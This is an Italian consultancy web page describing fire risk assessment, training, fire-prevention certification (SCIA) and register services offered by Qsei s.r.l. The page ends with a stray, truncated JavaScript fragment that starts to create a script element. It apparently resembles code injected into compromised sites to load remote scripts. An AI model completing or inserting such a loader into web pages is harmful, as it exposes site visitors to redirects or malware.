Posted in Senza categoria

VALUTAZIONE RISCHIO INCENDIO

FORMAZIONE

CERTIFICATO DI PREVENZIONE INCENDI – SCIA

REGISTRO DI ATTIVITA’ E DISPOSITIVI

Qsei s.r.l. esegue:

VALUTAZIONE RISCHIO INCENDIO

  • la valutazione del rischio come dettato da DM 10 MAR 1998 e D.L.vo 81/2008 e tratterà gli argomenti citati dall’ALL. I;
  • le attività di supporto al Datore di Lavoro ed al Responsabile del Servizio di Prevenzione e Protezione per individuare e realizzare le misure tecniche, organizzative, procedurali di tutela dei lavoratori e dell’azienda.

FORMAZIONE-INFORMAZIONE-ADDESTRAMENTO

  • l’informazione e la formazione dei lavoratori e l’addestramento dei lavoratori addetti alla protezione antincendio, all’emergenza salvataggio ed evacuazione;

PREVENZIONE INCENDI

Qsei s.r.l. assiste i titolari delle attività soggette alla normativa di prevenzione incendi (D.P.R. 151/2011) per il disbrigo delle pratiche utili a rientrare nei criteri autorizzativi ad espletare l’attività aziendale (SCIA ed equipollenti).

E’ redatta la progettazione antincendio secondo il decreto su citato, comprensivo degli elaborati grafici, delle Certificazione (requisiti tecnici e funzionalità dei dispositivi, resistenza al fuoco, altre previste dal Progetto) e delle altre documentazioni necessarie.

Ad ogni adempimento sarà allegata la valutazione del rischio incendio ed il Piano di Emergenza-Salvataggio-Evacuazione.

In egual misura, è prevista l’assistenza ai rinnovi.

REGISTRO

Qsei s.r.l. può fornire il registro per le attività di controllo e verifica antincendio in formato Excel e la consulenza per l’individuazione delle attività e dei dispositivi la cui gestione è soggetta a registrazione.

var d=document;var s=d.createElement(‘script’);